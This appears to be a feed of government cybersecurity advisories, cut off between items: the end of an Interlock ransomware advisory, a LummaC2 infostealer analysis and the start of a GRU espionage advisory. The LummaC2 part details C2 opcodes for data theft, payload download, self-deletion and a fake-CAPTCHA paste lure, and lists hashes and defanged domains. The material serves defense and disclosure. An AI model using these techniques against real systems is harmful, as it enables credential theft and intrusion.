double-extortion model [<a href="https://attack.mitre.org/versions/v17/techniques/T1657/" target="_blank">T1657</a>], encrypting systems after exfiltrating data. The ransom note provides each victim with a unique code and instructions to contact the ransomware actors via a <code>.onion</code> URL.&nbsp;</p> <p>Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note16"><sup>16</sup></a></p> <h2><a class="ck-anchor" id="leveraged-tools"><strong>Leveraged Tools</strong></a></h2> <p>See <strong>Table 2</strong> for publicly available tools and applications used by Interlock ransomware actors. This includes legitimate tools repurposed for their operations.</p> <p><strong>Disclaimer</strong>: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption>Table 2. Tools Used by Interlock Ransomware Actors</caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Tool Name</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>AnyDesk</td> <td>A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.</td> </tr> <tr> <td>Cobalt Strike</td> <td>A penetration testing tool used by security professionals to test the security of networks and systems.</td> </tr> <tr> <td>PowerShell</td> <td>A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</td> </tr> <tr> <td>PSExec</td> <td>A tool designed to run programs and execute commands on remote systems.</td> </tr> <tr> <td>PuTTY.exe</td> <td>An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).</td> </tr> <tr> <td>ScreenConnect</td> <td>A remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect’s official cloud domains (domains available upon request from ConnectWise).</td> </tr> <tr> <td>SystemBC</td> <td>Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors’ C2 servers.</td> </tr> <tr> <td>Windows Console Host</td> <td>Windows Console Host (<code>conhost.exe</code>) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.&nbsp;</td> </tr> <tr> <td>WinSCP</td> <td>A free and open source SSH File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol client.</td> </tr> </tbody> </table> <h2><a class="ck-anchor" id="leveraged-files"><strong>Leveraged Files</strong></a></h2> <p>See <strong>Table 3</strong> and <strong>Table 4 </strong>for files used by Interlock ransomware actors. These were obtained from FBI investigations as recently as June 2025.</p> <p><strong>Disclaimer</strong>: Some of the hashes are for legitimate tools and applications and should not be attributed as malicious without analytical evidence to support threat actor use and/or control. The authoring agencies recommend organizations investigate or vet these hashes prior to taking action, such as blocking.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption>Table 3. Files Used by Interlock Ransomware Actors (SHA-256)</caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File Name</th> <th role="columnheader">Hash</th> </tr> </thead> <tbody> <tr> <td Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b US-CERT Alerts urn:uuid:6277f226-4f12-f336-818e-33d36098ec04 Tue, 20 May 2025 19:20:23 +0000 <h2><strong>Summary</strong></h2> <p>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.</p> <p>The FBI and CISA encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of LummaC2 malware.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-05/aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations.pdf" class="c-file__link" target="_blank">AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations</a> <span class="c-file__size">(PDF, 1.28 MB )</span> </div> </div> <p>For a downloadable copy of IOCs, see:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-05/AA25-141B.stix_.xml" class="c-file__link" target="_blank">AA25-141B STIX XML</a> <span class="c-file__size">(XML, 146.54 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-05/AA25-141B-Threat-Actors-Deploy-LummaC2-Malware-to-Exfiltrate-Sensitive-Data-from-Organizations.stix_.json" class="c-file__link" target="_blank">AA25-141B STIX JSON</a> <span class="c-file__size">(JSON, 300.90 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK® Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for threat actor activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Overview</h3> <p>LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" title="T1566.002">T1566.002</a>]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.</p> <p>To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/" target="_blank" title="T1036">T1036</a>]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a>].</p> <p>Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [<a href="https://attack.mitre.org/versions/v17/tactics/TA0010/" target="_blank" title="TA0010">TA0010</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1119/" target="_blank" title="T1119">T1119</a>]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.</p> <h3>File Execution</h3> <p>Upon execution, the <code>LummaC2.exe</code> file will enter its main routine, which includes four sub-routines (see <strong>Figure 1</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%201%20-%20LummaC2%20Main%20Routine.png?itok=4-3q4JJo" width="653" height="185" alt="Figure 1. LummaC2 Main Routine"> </div> <figcaption class="c-figure__caption"><em>Figure 1. LummaC2 Main Routine</em></figcaption> </figure> <p>The first routine decrypts strings for a message box that is displayed to the user (see <strong>Figure 2</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%202%20-%20Message%20Box.png?itok=ORRAaghu" width="660" height="157" alt="Figure 2. Message Box"> </div> <figcaption class="c-figure__caption"><em>Figure 2. Message Box</em></figcaption> </figure> <p>If the user selects <code>No</code>, the malware will exit. If the user selects <code>Yes</code>, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [<a href="https://attack.mitre.org/versions/v17/techniques/T1140/" target="_blank" title="T1140">T1140</a>]. A list of observed domains is included in the <strong>Indicators of Compromise</strong> section.</p> <p>After each domain is decoded, the implant will attempt a <code>POST</code> request [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/001/" target="_blank" title="T1071.001">T1071.001</a>] (see <strong>Figure 3</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%203%20-%20Post%20Request.png?itok=nPWt04-t" width="648" height="143" alt="Figure 3. Post Request"> </div> <figcaption class="c-figure__caption"><em>Figure 3. </em><code><em>Post</em></code><em> Request</em></figcaption> </figure> <p>If the <code>POST</code> request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see <strong>Figure 4</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%204%20-%20Code%20Saving%20Successful%20Callback%20Request.png?itok=txJPFJab" width="660" height="152" alt="Figure 4. Code Saving Successful Callback Request"> </div> <figcaption class="c-figure__caption"><em>Figure 4. Code Saving Successful Callback Request</em></figcaption> </figure> <p>Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) <code>GetUserNameW</code> and <code>GetComputerNameW</code> respectively [<a href="https://attack.mitre.org/versions/v17/techniques/T1012/" target="_blank" title="T1012">T1012</a>]. The returned data is then hashed and compared against a hard-coded hash value (see <strong>Figure 5</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%205%20-%20User%20and%20Computer%20Name%20Check.png?itok=ZYtbs3GM" width="655" height="175" alt="Figure 5. User and Computer Name Check"> </div> <figcaption class="c-figure__caption"><em>Figure 5. User and Computer Name Check</em></figcaption> </figure> <p>The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.</p> <p>If the username hash is equal to the value <code>0x56CF7626</code>, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of <code>0xB09406C7</code>. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.</p> <p>If the username and hostname check function returns <code>zero</code> (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following <code>POST</code> request (see <strong>Figure 6</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%206%20-%20Second%20POST%20Request.png?itok=4cdoQzJY" width="648" height="143" alt="Figure 6. Second POST Request"> </div> <figcaption class="c-figure__caption"><em>Figure 6. Second </em><code><em>POST</em></code><em> Request</em></figcaption> </figure> <p>The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the <code>ex</code> key, which contains an array of objects (see <strong>Figure 7</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%207%20-%20Parsing%20of%20ex%20JSON%20Value.png?itok=rotohQzR" width="656" height="52" alt="Figure 7. Parsing of ex JSON Value"> </div> <figcaption class="c-figure__caption"><em>Figure 7. Parsing of </em><code><em>ex</em></code><em> JSON Value</em></figcaption> </figure> <p>Parsing the <code>c</code> key contains an array of objects, which will give the implant its C2 (see <strong>Figure 8</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%208%20-%20Parsing%20of%20c%20JSON%20Value.png?itok=CH958VKZ" width="658" height="91" alt="Figure 8. Parsing of c JSON Value"> </div> <figcaption class="c-figure__caption"><em>Figure 8. Parsing of </em><code><em>c</em></code><em> JSON Value</em></figcaption> </figure> <h3>C2 Instructions</h3> <p>Each array object that contains the JSON key value of <code>t</code> will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.</p> <h4><strong>1. Opcode </strong><code><strong>0</strong></code><strong> – Steal Data Generic</strong></h4> <p>This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode <code>O</code> command option allows LummaC2 affiliates to add their custom information gathering details (see <strong>Table 1</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;2. Opcode </em><code><em>1</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>p</td> <td>Path to steal from</td> </tr> <tr> <td>m</td> <td>File extensions to read</td> </tr> <tr> <td>z</td> <td>Output directory to store stolen data</td> </tr> <tr> <td>d</td> <td>Depth of recursiveness</td> </tr> <tr> <td>fs</td> <td>Maximum file size</td> </tr> </tbody> </table> <h4><strong>2. Opcode </strong><code><strong>1</strong></code><strong> – Steal Browser Data</strong></h4> <p>This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [<a href="https://attack.mitre.org/versions/v17/techniques/T1217/" target="_blank" title="T1217">T1217</a>] (see <strong>Table 2</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2. Opcode </em><code><em>1</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>p</td> <td>Path to steal from</td> </tr> <tr> <td>z</td> <td>Name of Browser – Output</td> </tr> </tbody> </table> <h4><strong>3. Opcode </strong><code><strong>2</strong></code><strong> – Steal Browser Data (Mozilla)</strong></h4> <p>This command is identical to Opcode <code>1</code>; however, this option seems to be utilized solely for Mozilla browser data (see <strong>Table 3</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 3. Opcode </em><code><em>2</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>p</td> <td>Path to steal from</td> </tr> <tr> <td>z</td> <td>Name of Browser – Output</td> </tr> </tbody> </table> <h4><strong>4. Opcode </strong><code><strong>3</strong></code><strong> – Download a File</strong></h4> <p>This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with <code>u</code> to download and create the extension specified in the <code>ft</code> key [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a>] (see <strong>Table 4</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 4. Opcode </em><code><em>3</em></code><em> Options</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>u</td> <td>URL for Download</td> </tr> <tr> <td>ft</td> <td>File Extension</td> </tr> <tr> <td>e&nbsp;</td> <td>Execution Type</td> </tr> </tbody> </table> <p>The <code>e</code> value can take two values: <code>0</code> or <code>1</code>. This specifies how to execute the downloaded file either with the <code>LoadLibrary</code> API or via the command line with <code>rundll32.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1106/" target="_blank" title="T1106">T1106</a>] (see <strong>Table 5</strong>).</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;5. Execution Types</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Key</th> <th role="columnheader">Value</th> </tr> </thead> <tbody> <tr> <td>e=0</td> <td>Execute with <code>LoadLibraryW()</code></td> </tr> <tr> <td>e=1</td> <td>Executive with <code>rund1132.exe</code></td> </tr> </tbody> </table> <h4><strong>5. Take Screenshot</strong></h4> <p>If the configuration JSON file has a key of “<code>se</code>” and its value is “<code>true</code>,” the malware will take a screenshot in BMP format and upload it to the C2 server.</p> <h4><strong>6. Delete Self</strong></h4> <p>If the configuration JSON file has a key of “<code>ad</code>” and its value is “<code>true</code>,” the malware will enter a routine to delete itself.</p> <p>The command shown in <strong>Figure 9</strong> will be decoded and executed for self-deletion.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%209%20-%20Self-Deletion%20Command%20Line.png?itok=BqtyYanh" width="649" height="44" alt="Figure 9. Self-Deletion Command Line"> </div> <figcaption class="c-figure__caption"><em>Figure 9. Self-Deletion Command Line</em></figcaption> </figure> <p><strong>Figure 10</strong> depicts the above command line during execution.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%2010%20-%20Decoded%20Command%20Line%20in%20Memory.png?itok=QsVu940K" width="662" height="192" alt="Figure 10. Decoded Command Line in Memory"> </div> <figcaption class="c-figure__caption"><em>Figure 10. Decoded Command Line in Memory</em></figcaption> </figure> <h3>Host Modifications</h3> <p>Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.</p> <h3>Decrypted Strings</h3> <p>Below is a list of hard-coded decrypted strings located in the binary (see <strong>Figure 11</strong>).</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2025-05/Figure%2011%20-%20Decoded%20Strings.png?itok=4A8LZC0N" width="653" height="355" alt="Figure 11. Decoded Strings"> </div> <figcaption class="c-figure__caption"><em>Figure 11. Decoded Strings</em></figcaption> </figure> <h2><strong>Indicators of Compromise</strong></h2> <p>See <strong>Table 6</strong> and <strong>Table 7</strong> for LummaC2 IOCs obtained by the FBI and trusted third parties.</p> <p><strong>Disclaimer:</strong> The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 6. LummaC2 Executable Hashes</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Executables</th> <th role="columnheader">Type</th> </tr> </thead> <tbody> <tr> <td>4AFDC05708B8B39C82E60ABE3ACE55DB (<code>LummaC2.exe</code> from November 2023)</td> <td>MD5</td> </tr> <tr> <td>E05DF8EE759E2C955ACC8D8A47A08F42 (<code>LummaC2.exe</code> from November 2023)</td> <td>MD5</td> </tr> <tr> <td>C7610AE28655D6C1BCE88B5D09624FEF</td> <td>MD5</td> </tr> <tr> <td>1239288A5876C09D9F0A67BCFD645735168A7C80 (<code>LummaC2.exe</code> from November 2023)</td> <td>SHA1</td> </tr> <tr> <td>B66DA4280C6D72ADCC68330F6BD793DF56A853CB (<code>LummaC2.exe</code> from November 2023)</td> <td>SHA1</td> </tr> <tr> <td>3B267FA5E1D1B18411C22E97B367258986E871E5</td> <td>TLSH</td> </tr> <tr> <td>19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023)</td> <td>SHA256</td> </tr> <tr> <td>2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (<code>LummaC2.exe</code> from November 2023)</td> <td>SHA256</td> </tr> <tr> <td>4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D</td> <td>SHA256</td> </tr> <tr> <td>325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a</td> <td>SHA256</td> </tr> <tr> <td>76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c</td> <td>SHA256</td> </tr> <tr> <td>7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70</td> <td>SHA256</td> </tr> <tr> <td>a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab</td> <td>SHA256</td> </tr> <tr> <td>b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959</td> <td>SHA256</td> </tr> <tr> <td>ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b</td> <td>SHA256</td> </tr> </tbody> </table> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 7. LummaC2 DLL Binaries</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">DLL Binaries</th> <th role="columnheader">Type</th> </tr> </thead> <tbody> <tr> <td>iphlpapi.dll</td> <td>IP Helper API</td> </tr> <tr> <td>winhttp.dll</td> <td>Windows HTTP Services</td> </tr> </tbody> </table> <p>The following are domains observed deploying LummaC2 malware.</p> <div class="WordSection1"> <p><strong>Disclaimer:</strong> The domains below are historical in nature and may not currently be malicious.</p> </div> <div class="WordSection2"> <ul> <li>Pinkipinevazzey[.]pw</li> <li>Fragnantbui[.]shop</li> <li>Medicin Russian GRU Targeting Western Logistics Entities and Technology Companies https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a US-CERT Alerts urn:uuid:09300ecc-4879-9553-19bd-fa896ef70516 Mon, 12 May 2025 16:49:12 +0000 <h2><strong>Executive Summary</strong></h2> <p>This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#CybersecurityIndustryTracking" title="CybersecurityIndustryTracking">Cybersecurity Industry Tracking</a>”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.</p> <p>Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.</p> <p>This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.</p> <p>The following authors and co-sealers are releasing this CSA:</p> <ul> <li>United States National Security Agency (NSA)</li> <li>United States Federal Bureau of Investigation (FBI)</li> <li>United Kingdom National Cyber Security Centre (NCSC-UK)</li> <li>Germany Federal Intelligence Service (BND)&nbsp;Bundesnachrichtendienst</li> <li>Germany Federal Office for Information Security (BSI)&nbsp;Bundesamt für Sicherheit in der Informationstechnik</li> <li>Germany Federal Office for the Protection of the Constitution (BfV)&nbsp;Bundesamt für Verfassungsschutz</li> <li>Czech Republic Military Intelligence (VZ)&nbsp; Vojenské zpravodajství</li> <li>Czech Republic National Cyber and Information Security Agency (NÚKIB)&nbsp;Národní úřad pro kybernetickou a informační bezpečnost</li> <li>Czech Republic Security Information Service (BIS)&nbsp;Bezpečnostní informační služba</li> <li>Poland Internal Security Agency (ABW)&nbsp;Agencja Bezpieczeństwa Wewnętrznego</li> <li>Poland Military Counterintelligence Service (SKW)&nbsp;Służba Kontrwywiadu Wojskowego</li> <li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li> <li>United States Department of Defense Cyber Crime Center (DC3)</li> <li>United States Cyber Command (USCYBERCOM)</li> <li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li> <li>Canadian Centre for Cyber Security (CCCS)</li> <li>Danish Defence Intelligence Service (DDIS)&nbsp;Forsvarets Efterretningstjeneste</li> <li>Estonian Foreign Intelligence Service (EFIS)&nbsp;Välisluureamet</li> <li>Estonian National Cyber Security Centre (NCSC-EE)&nbsp;Küberturvalisuse keskus</li> <li>French Cybersecurity Agency (ANSSI)&nbsp;Agence nationale de la sécurité des systèmes d'information</li> <li>Netherlands Defence Intelligence and Security Service (MIVD)&nbsp;Militaire Inlichtingen- en Veiligheidsdienst<br>&nbsp;</li> </ul> <p>Download the PDF version of this report:</p> <p><a href="https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF" target="_blank" title="Russian GRU Targeting Western Logistics Entities and Technology Companies ">Russian GRU Targeting Western Logistics Entities and Technology Companies</a> (PDF, 1,081KB)</p> <p>For a downloadable list of IOCs, visit:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141A-Russian-GRU-Targeting-Western-Logistics-Entities-and-Technology-Companies.stix_.xml" class="c-file__link" target="_blank">AA25-141A STIX XML</a> <span class="c-file__size">(XML, 117.02 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-05/AA25-141A-Russian-GRU-Targeting-Western-Logistics-Entities-and-Technology-Companies.stix_.json" class="c-file__link" target="_blank">AA25-141A STIX JSON</a> <span class="c-file__size">(JSON, 144.29 KB )</span> </div> </div> <h2><strong>Introduction</strong></h2> <p>For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.<br>In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited1" title="1">1</a>] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.<br>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 17. See <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#appendixa" title="Appendix A">Appendix A: MITRE ATT&amp;CK tactics and techniques</a> for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.</p> <h2><strong>Description of Targets</strong></h2> <p>The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:&nbsp;</p> <ul> <li>&nbsp;Defense Industry</li> <li>Transportation and Transportation Hubs (ports, airports, etc.)</li> <li>Maritime</li> <li>Air Traffic Management</li> <li>IT Services</li> </ul> <p>In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [<a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a>].</p> <p>The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [<a href="https://attack.mitre.org/versions/v17/tactics/TA0043/" target="_blank" title="TA0043">TA0043</a>].</p> <p>The countries with targeted entities include the following, as illustrated in Figure 1:</p> <ul> <li>Bulgaria</li> <li>Czech Republic</li> <li>France</li> <li>Germany</li> <li>Greece</li> <li>Italy</li> <li>Moldova</li> <li>Netherlands</li> <li>Poland</li> <li>Romania</li> <li>Slovakia</li> <li>Ukraine</li> <li>United States<br>&nbsp;</li> </ul> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-05/Countries%20with%20Targeted%20Entities.png?itok=UKD_QLvF" width="975" height="308" alt="Map demonstrating Targeted Entities"> </div> <figcaption class="c-figure__caption">Figure 1: Countries with Targeted Entities</figcaption> </figure> <h2><strong>Initial Access TTPs</strong></h2> <p>To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to):</p> <ul> <li>Credential guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>] / brute force [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>]</li> <li>Spearphishing for credentials [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a>]</li> <li>Spearphishing delivering malware [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" 